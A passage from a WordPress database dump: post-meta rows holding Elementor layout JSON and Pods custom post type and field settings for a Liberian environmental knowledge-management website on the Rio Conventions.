More\"},\"elements\":[],\"widgetType\":\"oew-blog-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ab9288a\",\"elType\":\"widget\",\"settings\":{\"number\":10,\"equal_height_cols\":\"true\",\"post_type\":\"page\",\"posts_query\":\"ids\",\"title_trimmed_ending_text\":\"...\",\"show_image\":\"\",\"show_excerpt\":\"\",\"show_meta\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"rows_gap\":\"\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"18ceada\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c7672ae\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}]},\"elements\":[],\"widgetType\":\"jet-posts\"}],\"isInner\":false}],\"isInner\":false}]'),(3306,417,'_elementor_version','2.7.5'),(3307,417,'_elementor_template_type','wp-page'),(3311,418,'_elementor_controls_usage','a:0:{}'),(3312,418,'label_singular','Related Topic'),(3313,418,'public','1'),(3314,418,'show_ui','1'),(3315,418,'supports_title','1'),(3316,418,'supports_editor','1'),(3317,418,'type','post_type'),(3318,418,'storage','meta'),(3319,418,'old_name','related_topic'),(3320,418,'publicly_queryable','1'),(3321,418,'exclude_from_search','0'),(3322,418,'capability_type','page'),(3323,418,'capability_type_custom','related_topic'),(3324,418,'capability_type_extra','1'),(3325,418,'has_archive','1'),(3326,418,'hierarchical','0'),(3327,418,'rewrite','1'),(3328,418,'rewrite_with_front','1'),(3329,418,'rewrite_feeds','0'),(3330,418,'rewrite_pages','1'),(3331,418,'query_var','1'),(3332,418,'can_export','1'),(3333,418,'default_status','draft'),(3334,418,'supports_author','0'),(3335,418,'supports_thumbnail','1'),(3336,418,'supports_excerpt','1'),(3337,418,'supports_trackbacks','0'),(3338,418,'supports_custom_fields','0'),(3339,418,'supports_comments','0'),(3340,418,'supports_revisions','0'),(3341,418,'supports_page_attributes','0'),(3342,418,'supports_post_formats','0'),(3343,418,'built_in_taxonomies_category','0'),(3344,418,'built_in_taxonomies_elementor_library_category','0'),(3345,418,'built_in_taxonomies_elementor_library_type','0'),(3346,418,'built_in_taxonomies_link_category','0'),(3348,418,'built_in_taxonomies_post_tag','0'),(3349,418,'built_in_taxonomies_resource_category','0'),(3350,418,'built_in_taxonomies_resource_tag','1'),(3352,418,'show_in_menu','1'),(3353,418,'menu_position','0'),(3354,418,'show_in_nav_menus','1'),(3355,418,'show_in_admin_bar','1'),(3356,418,'pfat_enable','0'),(3357,418,'pfat_run_outside_loop','0'),(3358,418,'pfat_append_single','append'),(3359,418,'pfat_filter_single','the_content'),(3360,418,'pfat_append_archive','append'),(3361,418,'pfat_filter_archive','the_content'),(3362,418,'rest_enable','0'),(3363,418,'read_all','0'),(3364,418,'write_all','0'),(3366,413,'built_in_post_types_related_topic','1'),(3367,418,'menu_icon','dashicons-admin-site-alt3'),(3368,419,'_elementor_controls_usage','a:0:{}'),(3369,419,'label_singular','Document Resource'),(3370,419,'public','1'),(3371,419,'show_ui','1'),(3372,419,'supports_title','1'),(3373,419,'supports_editor','1'),(3374,419,'type','post_type'),(3375,419,'storage','meta'),(3376,419,'old_name','document'),(3377,419,'publicly_queryable','1'),(3378,419,'exclude_from_search','0'),(3379,419,'capability_type','post'),(3380,419,'capability_type_custom','epa_resource'),(3381,419,'capability_type_extra','1'),(3382,419,'has_archive','1'),(3383,419,'hierarchical','1'),(3384,419,'rewrite','1'),(3385,419,'rewrite_with_front','1'),(3386,419,'rewrite_feeds','0'),(3387,419,'rewrite_pages','1'),(3388,419,'query_var','1'),(3389,419,'can_export','1'),(3390,419,'default_status','draft'),(3391,419,'supports_author','0'),(3392,419,'supports_thumbnail','1'),(3393,419,'supports_excerpt','0'),(3394,419,'supports_trackbacks','0'),(3395,419,'supports_custom_fields','0'),(3396,419,'supports_comments','0'),(3397,419,'supports_revisions','0'),(3398,419,'supports_page_attributes','0'),(3399,419,'supports_post_formats','0'),(3400,419,'built_in_taxonomies_category','0'),(3401,419,'built_in_taxonomies_elementor_library_category','0'),(3402,419,'built_in_taxonomies_elementor_library_type','0'),(3403,419,'built_in_taxonomies_link_category','0'),(3405,419,'built_in_taxonomies_post_tag','0'),(3406,419,'built_in_taxonomies_resource_category','1'),(3407,419,'built_in_taxonomies_resource_tag','1'),(3409,419,'show_in_menu','1'),(3410,419,'menu_position','0'),(3411,419,'menu_icon','dashicons-portfolio'),(3412,419,'show_in_nav_menus','1'),(3413,419,'show_in_admin_bar','1'),(3414,419,'pfat_enable','1'),(3415,419,'pfat_run_outside_loop','0'),(3416,419,'pfat_append_single','append'),(3417,419,'pfat_filter_single','the_content'),(3418,419,'pfat_append_archive','append'),(3419,419,'pfat_filter_archive','custom'),(3420,419,'rest_enable','0'),(3421,419,'read_all','0'),(3422,419,'write_all','0'),(3425,420,'_elementor_controls_usage','a:0:{}'),(3426,420,'type','file'),(3427,420,'pick_object','custom-simple'),(3428,420,'required','0'),(3429,420,'text_allow_shortcode','0'),(3430,420,'text_allow_html','0'),(3431,420,'text_allowed_html_tags','strong em a ul ol li b i'),(3432,420,'text_max_length','255'),(3433,420,'website_format','normal'),(3434,420,'website_allow_port','0'),(3435,420,'website_clickable','0'),(3436,420,'website_new_window','0'),(3437,420,'website_max_length','255'),(3438,420,'website_html5','0'),(3439,420,'phone_format','999-999-9999 x999'),(3440,420,'phone_enable_phone_extension','1'),(3441,420,'phone_max_length','25'),(3442,420,'phone_html5','0'),(3443,420,'email_max_length','255'),(3444,420,'email_html5','0'),(3445,420,'password_max_length','255'),(3446,420,'paragraph_allow_html','1'),(3447,420,'paragraph_oembed','0'),(3448,420,'paragraph_wptexturize','1'),(3449,420,'paragraph_convert_chars','1'),(3450,420,'paragraph_wpautop','1'),(3451,420,'paragraph_allow_shortcode','0'),(3452,420,'paragraph_allowed_html_tags','strong em a ul ol li b i'),(3453,420,'paragraph_max_length','0'),(3454,420,'wysiwyg_editor','tinymce'),(3455,420,'wysiwyg_media_buttons','1'),(3456,420,'wysiwyg_oembed','0'),(3457,420,'wysiwyg_wptexturize','1'),(3458,420,'wysiwyg_convert_chars','1'),(3459,420,'wysiwyg_wpautop','1'),(3460,420,'wysiwyg_allow_shortcode','0'),(3461,420,'code_allow_shortcode','0'),(3462,420,'code_max_length','0'),(3463,420,'datetime_type','format'),(3464,420,'datetime_format','mdy'),(3465,420,'datetime_time_type','12'),(3466,420,'datetime_time_format','h_mma'),(3467,420,'datetime_time_format_24','hh_mm'),(3468,420,'datetime_allow_empty','1'),(3469,420,'datetime_html5','0'),(3470,420,'date_type','format'),(3471,420,'date_format','mdy'),(3472,420,'date_allow_empty','1'),(3473,420,'date_html5','0'),(3474,420,'time_type','12'),(3475,420,'time_format','h_mma'),(3476,420,'time_format_24','hh_mm'),(3477,420,'time_allow_empty','1'),(3478,420,'time_html5','0'),(3479,420,'number_format_type','number'),(3480,420,'number_format','i18n'),(3481,420,'number_decimals','0'),(3482,420,'number_format_soft','0'),(3483,420,'number_step','1'),(3484,420,'number_min','0'),(3485,420,'number_max','100'),(3486,420,'number_max_length','12'),(3487,420,'currency_format_type','number'),(3488,420,'currency_format_sign','usd'),(3489,420,'currency_format_placement','before'),(3490,420,'currency_format','i18n'),(3491,420,'currency_decimals','2'),(3492,420,'currency_decimal_handling','none'),(3493,420,'currency_step','1'),(3494,420,'currency_min','0'),(3495,420,'currency_max','1000'),(3496,420,'currency_max_length','12'),(3497,420,'file_format_type','multi'),(3498,420,'file_uploader','attachment'),(3499,420,'file_attachment_tab','upload'),(3500,420,'file_edit_title','0'),(3501,420,'file_show_edit_link','0'),(3502,420,'file_linked','1'),(3503,420,'file_limit','0'),(3504,420,'file_restrict_filesize','10MB'),(3505,420,'file_type','any'),(3506,420,'file_field_template','rows'),(3507,420,'file_add_button','Add Document'),(3508,420,'file_modal_title','Attach a file'),(3509,420,'file_modal_add_button','Add File'),(3510,420,'file_wp_gallery_output','0'),(3511,420,'file_wp_gallery_link','post'),(3512,420,'file_wp_gallery_columns','1'),(3513,420,'file_wp_gallery_random_sort','0'),(3514,420,'file_wp_gallery_size','thumbnail'),(3515,420,'oembed_width','0'),(3516,420,'oembed_height','0'),(3517,420,'oembed_show_preview','0'),(3518,420,'oembed_restrict_providers','0'),(3519,420,'oembed_enabled_providers_amazoncn','0'),(3520,420,'oembed_enabled_providers_amazoncouk','0'),(3521,420,'oembed_enabled_providers_amazoncom','0'),(3522,420,'oembed_enabled_providers_amazoncomau','0'),(3523,420,'oembed_enabled_providers_amazonin','0'),(3524,420,'oembed_enabled_providers_animotocom','0'),(3525,420,'oembed_enabled_providers_cloudupcom','0'),(3526,420,'oembed_enabled_providers_collegehumorcom','0'),(3527,420,'oembed_enabled_providers_crowdsignalcom','0'),(3528,420,'oembed_enabled_providers_dailymotioncom','0'),(3529,420,'oembed_enabled_providers_facebookcom','0'),(3530,420,'oembed_enabled_providers_flickrcom','0'),(3531,420,'oembed_enabled_providers_hulucom','0'),(3532,420,'oembed_enabled_providers_imgurcom','0'),(3533,420,'oembed_enabled_providers_instagramcom','0'),(3534,420,'oembed_enabled_providers_issuucom','0'),(3535,420,'oembed_enabled_providers_kickstartercom','0'),(3536,420,'oembed_enabled_providers_meetupcom','0'),(3537,420,'oembed_enabled_providers_mixcloudcom','0'),(3538,420,'oembed_enabled_providers_redditcom','0'),(3539,420,'oembed_enabled_providers_reverbnationcom','0'),(3540,420,'oembed_enabled_providers_screencastcom','0'),(3541,420,'oembed_enabled_providers_scribdcom','0'),(3542,420,'oembed_enabled_providers_slidesharenet','0'),(3543,420,'oembed_enabled_providers_smugmugcom','0'),(3544,420,'oembed_enabled_providers_someecardscom','0'),(3545,420,'oembed_enabled_providers_soundcloudcom','0'),(3546,420,'oembed_enabled_providers_speakerdeckcom','0'),(3547,420,'oembed_enabled_providers_spotifycom','0'),(3548,420,'oembed_enabled_providers_tedcom','0'),(3549,420,'oembed_enabled_providers_tumblrcom','0'),(3550,420,'oembed_enabled_providers_twittercom','0'),(3551,420,'oembed_enabled_providers_vimeocom','0'),(3552,420,'oembed_enabled_providers_wordpresscom','0'),(3553,420,'oembed_enabled_providers_wordpresstv','0'),(3554,420,'oembed_enabled_providers_youtubecom','0'),(3555,420,'pick_format_type','single'),(3556,420,'pick_format_single','dropdown'),(3557,420,'pick_format_multi','checkbox'),(3558,420,'pick_allow_add_new','1'),(3559,420,'pick_taggable','0'),(3560,420,'pick_show_icon','1'),(3561,420,'pick_show_edit_link','1'),(3562,420,'pick_show_view_link','1'),(3563,420,'pick_limit','0'),(3564,420,'pick_user_role','a:0:{}'),(3565,420,'pick_post_status','a:1:{i:0;s:7:\"publish\";}'),(3566,420,'boolean_format_type','checkbox'),(3567,420,'boolean_yes_label','Yes'),(3568,420,'boolean_no_label','No'),(3569,420,'admin_only','0'),(3570,420,'restrict_role','0'),(3571,420,'restrict_capability','0'),(3572,420,'hidden','0'),(3573,420,'read_only','0'),(3574,420,'roles_allowed','a:1:{i:0;s:13:\"administrator\";}'),(3575,420,'rest_read','0'),(3576,420,'rest_write','0'),(3577,420,'rest_pick_response','array'),(3578,420,'rest_pick_depth','2'),(3733,422,'_elementor_controls_usage','a:0:{}'),(3734,422,'type','text'),(3735,422,'required','0'),(3736,422,'text_allow_shortcode','0'),(3737,422,'text_allow_html','0'),(3738,422,'text_allowed_html_tags','strong em a ul ol li b i'),(3739,422,'text_max_length','255'),(3740,422,'website_format','normal'),(3741,422,'website_allow_port','0'),(3742,422,'website_clickable','0'),(3743,422,'website_new_window','0'),(3744,422,'website_max_length','255'),(3745,422,'website_html5','0'),(3746,422,'phone_format','999-999-9999 x999'),(3747,422,'phone_enable_phone_extension','1'),(3748,422,'phone_max_length','25'),(3749,422,'phone_html5','0'),(3750,422,'email_max_length','255'),(3751,422,'email_html5','0'),(3752,422,'password_max_length','255'),(3753,422,'paragraph_allow_html','1'),(3754,422,'paragraph_oembed','0'),(3755,422,'paragraph_wptexturize','1'),(3756,422,'paragraph_convert_chars','1'),(3757,422,'paragraph_wpautop','1'),(3758,422,'paragraph_allow_shortcode','0'),(3759,422,'paragraph_allowed_html_tags','strong em a ul ol li b i'),(3760,422,'paragraph_max_length','0'),(3761,422,'wysiwyg_editor','tinymce'),(3762,422,'wysiwyg_media_buttons','1'),(3763,422,'wysiwyg_oembed','0'),(3764,422,'wysiwyg_wptexturize','1'),(3765,422,'wysiwyg_convert_chars','1'),(3766,422,'wysiwyg_wpautop','1'),(3767,422,'wysiwyg_allow_shortcode','0'),(3768,422,'code_allow_shortcode','0'),(3769,422,'code_max_length','0'),(3770,422,'datetime_type','format'),(3771,422,'datetime_format','mdy'),(3772,422,'datetime_time_type','12'),(3773,422,'datetime_time_format','h_mma'),(3774,422,'datetime_time_format_24','hh_mm'),(3775,422,'datetime_allow_empty','1'),(3776,422,'datetime_html5','0'),(3777,422,'date_type','format'),(3778,422,'date_format','mdy'),(3779,422,'date_allow_empty','1'),(3780,422,'date_html5','0'),(3781,422,'time_type','12'),(3782,422,'time_format','h_mma'),(3783,422,'time_format_24','hh_mm'),(3784,422,'time_allow_empty','1'),(3785,422,'time_html5','0'),(3786,422,'number_format_type','number'),(3787,422,'number_format','i18n'),(3788,422,'number_decimals','0'),(3789,422,'number_format_soft','0'),(3790,422,'number_step','1'),(3791,422,'number_min','0'),(3792,422,'number_max','100'),(3793,422,'number_max_length','12'),(3794,422,'currency_format_type','number'),(3795,422,'currency_format_sign','usd'),(3796,422,'currency_format_placement','before'),(3797,422,'currency_format','i18n'),(3798,422,'currency_decimals','2'),(3799,422,'currency_decimal_handling','none'),(3800,422,'currency_step','1'),(3801,422,'currency_min','0'),(3802,422,'currency_max','1000'),(3803,422,'currency_max_length','12'),(3804,422,'file_format_type','single'),(3805,422,'file_uploader','attachment'),(3806,422,'file_attachment_tab','upload'),(3807,422,'file_edit_title','1'),(3808,422,'file_show_edit_link','0'),(3809,422,'file_linked','0'),(3810,422,'file_limit','0'),(3811,422,'file_restrict_filesize','10MB'),(3812,422,'file_type','images'),(3813,422,'file_field_template','rows'),(3814,422,'file_add_button','Add File'),(3815,422,'file_modal_title','Attach a file'),(3816,422,'file_modal_add_button','Add File'),(3817,422,'file_wp_gallery_output','0'),(3818,422,'file_wp_gallery_link','post'),(3819,422,'file_wp_gallery_columns','1'),(3820,422,'file_wp_gallery_random_sort','0'),(3821,422,'file_wp_gallery_size','thumbnail'),(3822,422,'oembed_width','0'),(3823,422,'oembed_height','0'),(3824,422,'oembed_show_preview','0'),(3825,422,'oembed_restrict_providers','0'),(3826,422,'oembed_enabled_providers_amazoncn','0'),(3827,422,'oembed_enabled_providers_amazoncouk','0'),(3828,422,'oembed_enabled_providers_amazoncom','0'),(3829,422,'oembed_enabled_providers_amazoncomau','0'),(3830,422,'oembed_enabled_providers_amazonin','0'),(3831,422,'oembed_enabled_providers_animotocom','0'),(3832,422,'oembed_enabled_providers_cloudupcom','0'),(3833,422,'oembed_enabled_providers_collegehumorcom','0'),(3834,422,'oembed_enabled_providers_crowdsignalcom','0'),(3835,422,'oembed_enabled_providers_dailymotioncom','0'),(3836,422,'oembed_enabled_providers_facebookcom','0'),(3837,422,'oembed_enabled_providers_flickrcom','0'),(3838,422,'oembed_enabled_providers_hulucom','0'),(3839,422,'oembed_enabled_providers_imgurcom','0'),(3840,422,'oembed_enabled_providers_instagramcom','0'),(3841,422,'oembed_enabled_providers_issuucom','0'),(3842,422,'oembed_enabled_providers_kickstartercom','0'),(3843,422,'oembed_enabled_providers_meetupcom','0'),(3844,422,'oembed_enabled_providers_mixcloudcom','0'),(3845,422,'oembed_enabled_providers_redditcom','0'),(3846,422,'oembed_enabled_providers_reverbnationcom','0'),(3847,422,'oembed_enabled_providers_screencastcom','0'),(3848,422,'oembed_enabled_providers_scribdcom','0'),(3849,422,'oembed_enabled_providers_slidesharenet','0'),(3850,422,'oembed_enabled_providers_smugmugcom','0'),(3851,422,'oembed_enabled_providers_someecardscom','0'),(3852,422,'oembed_enabled_providers_soundcloudcom','0'),(3853,422,'oembed_enabled_providers_speakerdeckcom','0'),(3854,422,'oembed_enabled_providers_spotifycom','0'),(3855,422,'oembed_enabled_providers_tedcom','0'),(3856,422,'oembed_enabled_providers_tumblrcom','0'),(3857,422,'oembed_enabled_providers_twittercom','0'),(3858,422,'oembed_enabled_providers_vimeocom','0'),(3859,422,'oembed_enabled_providers_wordpresscom','0'),(3860,422,'oembed_enabled_providers_wordpresstv','0'),(3861,422,'oembed_enabled_providers_youtubecom','0'),(3862,422,'pick_format_type','single'),(3863,422,'pick_format_single','dropdown'),(3864,422,'pick_format_multi','checkbox'),(3865,422,'pick_allow_add_new','1'),(3866,422,'pick_taggable','0'),(3867,422,'pick_show_icon','1'),(3868,422,'pick_show_edit_link','1'),(3869,422,'pick_show_view_link','1'),(3870,422,'pick_limit','0'),(3871,422,'pick_user_role','a:0:{}'),(3872,422,'pick_post_status','a:1:{i:0;s:7:\"publish\";}'),(3873,422,'boolean_format_type','checkbox'),(3874,422,'boolean_yes_label','Yes'),(3875,422,'boolean_no_label','No'),(3876,422,'admin_only','0'),(3877,422,'restrict_role','0'),(3878,422,'restrict_capability','0'),(3879,422,'hidden','0'),(3880,422,'read_only','0'),(3881,422,'roles_allowed','a:1:{i:0;s:13:\"administrator\";}'),(3882,422,'rest_read','0'),(3883,422,'rest_write','0'),(3884,422,'rest_pick_response','array'),(3885,422,'rest_pick_depth','2'),(3886,423,'_elementor_controls_usage','a:0:{}'),(3887,423,'type','text'),(3888,423,'required','0'),(3889,423,'text_allow_shortcode','0'),(3890,423,'text_allow_html','0'),(3891,423,'text_allowed_html_tags','strong em a ul ol li b i'),(3892,423,'text_max_length','255'),(3893,423,'website_format','normal'),(3894,423,'website_allow_port','0'),(3895,423,'website_clickable','0'),(3896,423,'website_new_window','0'),(3897,423,'website_max_length','255'),(3898,423,'website_html5','0'),(3899,423,'phone_format','999-999-9999 x999'),(3900,423,'phone_enable_phone_extension','1'),(3901,423,'phone_max_length','25'),(3902,423,'phone_html5','0'),(3903,423,'email_max_length','255'),(3904,423,'email_html5','0'),(3905,423,'password_max_length','255'),(3906,423,'paragraph_allow_html','1'),(3907,423,'paragraph_oembed','0'),(3908,423,'paragraph_wptexturize','1'),(3909,423,'paragraph_convert_chars','1'),(3910,423,'paragraph_wpautop','1'),(3911,423,'paragraph_allow_shortcode','0'),(3912,423,'paragraph_allowed_html_tags','strong em a ul ol li b i'),(3913,423,'paragraph_max_length','0'),(3914,423,'wysiwyg_editor','tinymce'),(3915,423,'wysiwyg_media_buttons','1'),(3916,423,'wysiwyg_oembed','0'),(3917,423,'wysiwyg_wptexturize','1'),(3918,423,'wysiwyg_convert_chars','1'),(3919,423,'wysiwyg_wpautop','1'),(3920,423,'wysiwyg_allow_shortcode','0'),(3921,423,'code_allow_shortcode','0'),(3922,423,'code_max_length','0'),(3923,423,'datetime_type','format'),(3924,423,'datetime_format','mdy'),(3925,423,'datetime_time_type','12'),(3926,423,'datetime_time_format','h_mma'),(3927,423,'datetime_time_format_24','hh_mm'),(3928,423,'datetime_allow_empty','1'),(3929,423,'datetime_html5','0'),(3930,423,'date_type','custom'),(3931,423,'date_format','y'),(3932,423,'date_year_range_custom','1990:2050'),(3933,423,'date_allow_empty','1'),(3934,423,'date_html5','0'),(3935,423,'time_type','12'),(3936,423,'time_format','h_mma'),(3937,423,'time_format_24','hh_mm'),(3938,423,'time_allow_empty','1'),(3939,423,'time_html5','0'),(3940,423,'number_format_type','number'),(3941,423,'number_format','i18n'),(3942,423,'number_decimals','0'),(3943,423,'number_format_soft','0'),(3944,423,'number_step','1'),(3945,423,'number_min','0'),(3946,423,'number_max','100'),(3947,423,'number_max_length','12'),(3948,423,'currency_format_type','number'),(3949,423,'currency_format_sign','usd'),(3950,423,'currency_format_placement','before'),(3951,423,'currency_format','i18n'),(3952,423,'currency_decimals','2'),(3953,423,'currency_decimal_handling','none'),(3954,423,'currency_step','1'),(3955,423,'currency_min','0'),(3956,423,'currency_max','1000'),(3957,423,'currency_max_length','12'),(3958,423,'file_format_type','single'),(3959,423,'file_uploader','attachment'),(3960,423,'file_attachment_tab','upload'),(3961,423,'file_edit_title','1'),(3962,423,'file_show_edit_link','0'),(3963,423,'file_linked','0'),(3964,423,'file_limit','0'),(3965,423,'file_restrict_filesize','10MB'),(3966,423,'file_type','images'),(3967,423,'file_field_template','rows'),(3968,423,'file_add_button','Add File'),(3969,423,'file_modal_title','Attach a file'),(3970,423,'file_modal_add_button','Add File'),(3971,423,'file_wp_gallery_output','0'),(3972,423,'file_wp_gallery_link','post'),(3973,423,'file_wp_gallery_columns','1'),(3974,423,'file_wp_gallery_random_sort','0'),(3975,423,'file_wp_gallery_size','thumbnail'),(3976,423,'oembed_width','0'),(3977,423,'oembed_height','0'),(3978,423,'oembed_show_preview','0'),(3979,423,'oembed_restrict_providers','0'),(3980,423,'oembed_enabled_providers_amazoncn','0'),(3981,423,'oembed_enabled_providers_amazoncouk','0'),(3982,423,'oembed_enabled_providers_amazoncom','0'),(3983,423,'oembed_enabled_providers_amazoncomau','0'),(3984,423,'oembed_enabled_providers_amazonin','0'),(3985,423,'oembed_enabled_providers_animotocom','0'),(3986,423,'oembed_enabled_providers_cloudupcom','0'),(3987,423,'oembed_enabled_providers_collegehumorcom','0'),(3988,423,'oembed_enabled_providers_crowdsignalcom','0'),(3989,423,'oembed_enabled_providers_dailymotioncom','0'),(3990,423,'oembed_enabled_providers_facebookcom','0'),(3991,423,'oembed_enabled_providers_flickrcom','0'),(3992,423,'oembed_enabled_providers_hulucom','0'),(3993,423,'oembed_enabled_providers_imgurcom','0'),(3994,423,'oembed_enabled_providers_instagramcom','0'),(3995,423,'oembed_enabled_providers_issuucom','0'),(3996,423,'oembed_enabled_providers_kickstartercom','0'),(3997,423,'oembed_enabled_providers_meetupcom','0'),(3998,423,'oembed_enabled_providers_mixcloudcom','0'),(3999,423,'oembed_enabled_providers_redditcom','0'),(4000,423,'oembed_enabled_providers_reverbnationcom','0'),(4001,423,'oembed_enabled_providers_screencastcom','0'),(4002,423,'oembed_enabled_providers_scribdcom','0'),(4003,423,'oembed_enabled_providers_slidesharenet','0'),(4004,423,'oembed_enabled_providers_smugmugcom','0'),(4005,423,'oembed_enabled_providers_someecardscom','0'),(4006,423,'oembed_enabled_providers_soundcloudcom','0'),(4007,423,'oembed_enabled_providers_speakerdeckcom','0'),(4008,423,'oembed_enabled_providers_spotifycom','0'),(4009,423,'oembed_enabled_providers_tedcom','0'),(4010,423,'oembed_enabled_providers_tumblrcom','0'),(4011,423,'oembed_enabled_providers_twittercom','0'),(4012,423,'oembed_enabled_providers_vimeocom','0'),(4013,423,'oembed_enabled_providers_wordpresscom','0'),(4014,423,'oembed_enabled_providers_wordpresstv','0'),(4015,423,'oembed_enabled_providers_youtubecom','0'),(4016,423,'pick_format_type','single'),(4017,423,'pick_format_single','dropdown'),(4018,423,'pick_format_multi','checkbox'),(4019,423,'pick_allow_add_new','1'),(4020,423,'pick_taggable','0'),(4021,423,'pick_show_icon','1'),(4022,423,'pick_show_edit_link','1'),(4023,423,'pick_show_view_link','1'),(4024,423,'pick_limit','0'),(4025,423,'pick_user_role','a:0:{}'),(4026,423,'pick_post_status','a:1:{i:0;s:7:\"publish\";}'),(4027,423,'boolean_format_type','checkbox'),(4028,423,'boolean_yes_label','Yes'),(4029,423,'boolean_no_label','No'),(4030,423,'admin_only','0'),(4031,423,'restrict_role','0'),(4032,423,'restrict_capability','0'),(4033,423,'hidden','0'),(4034,423,'read_only','0'),(4035,423,'roles_allowed','a:1:{i:0;s:13:\"administrator\";}'),(4036,423,'rest_read','0'),(4037,423,'rest_write','0'),(4038,423,'rest_pick_response','array'),(4039,423,'rest_pick_depth','2'),(4193,412,'built_in_post_types_epa_resource','1'),(4194,413,'built_in_post_types_epa_resource','1'),(4195,420,'unique','0'),(4197,422,'unique','0'),(4198,422,'text_repeatable','0'),(4199,423,'unique','0'),(4200,423,'date_repeatable','0'),(4203,423,'date_format_custom','year'),(4205,427,'_wp_page_template','default'),(4206,427,'_elementor_edit_mode','builder'),(4207,427,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_forest_biodiversity.jpg\",\"id\":396},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#113b66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.55},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":55},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics and Institutions Resources.<\\/p>\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_font_family\":\"Arial\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"search_submit_label\":\"Search\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"All Categories\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again 